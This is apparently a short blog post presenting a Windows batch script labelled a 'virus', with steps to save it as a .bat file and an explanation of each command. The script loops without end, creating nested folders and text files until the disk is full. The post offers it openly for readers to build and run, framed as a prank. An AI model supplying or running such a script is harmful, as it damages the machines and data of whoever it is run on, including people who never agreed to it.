______________________________
@echo off
mkdir virus
:loop
cd virus
mkdir virus
echo>text.txt
echo virus in the pc!!!!>>text.txt
goto loop
______________________________
Copy the command and paste in notepad and save as anything.bat
This virus will create infinite virus folders and text.txt file into the virus folder until the disk is completely filled.
Explanation :
mkdir : this command is used to create new folder .
cd : This command is used to change the current directory .
echo >text.txt : This command creates a new file ""text.txt""
echo text >>text.txt : This command writes the text specified after
the echo command to text.txt file.
:loop
commad
goto loop
^^^ looping statement in batch files
Tidak ada komentar:
Posting Komentar